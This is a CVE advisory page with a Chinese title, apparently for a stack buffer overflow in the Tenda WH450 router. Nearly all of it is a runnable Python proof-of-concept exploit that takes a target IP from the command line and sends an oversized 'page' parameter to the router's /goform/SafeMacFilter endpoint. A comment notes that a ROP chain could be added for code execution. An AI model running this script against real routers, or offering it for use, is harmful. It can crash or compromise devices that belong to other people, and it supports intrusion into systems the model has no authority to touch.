CVE-2025-15164 | Tenda WH450 goform/SafeMacFilter 栈缓冲区溢出漏洞

import requests # CVE-2025-15164 PoC - Tenda WH450 Stack Buffer Overflow # Target: Tenda WH450 router # Vulnerability: /goform/SafeMacFilter - page parameter stack overflow def exploit_cve_2025_15164(target_ip, target_port=80): """ PoC for CVE-2025-15164 This exploits a stack-based buffer overflow in Tenda WH450 via the /goform/SafeMacFilter endpoint with oversized page parameter """ url = f"http://{target_ip}:{target_port}/goform/SafeMacFilter" # Construct overflow payload # The overflow occurs when page parameter exceeds buffer size # Adjust the payload size based on target firmware buffer_size = 1000 # Adjust based on actual buffer size overflow_payload = "A" * buffer_size # Additional ROP chain could be added here for code execution # rop_chain = construct_rop_chain() params = { 'page': overflow_payload, # Other parameters may be required } try: response = requests.get(url, params=params, timeout=10) print(f"[*] Request sent to {url}") print(f"[*] Payload length: {len(overflow_payload)}") print(f"[*] Response status: {response.status_code}") return True except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return False if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve-2025-15164.py <target_ip>") sys.exit(1) target = sys.argv[1] exploit_cve_2025_15164(target)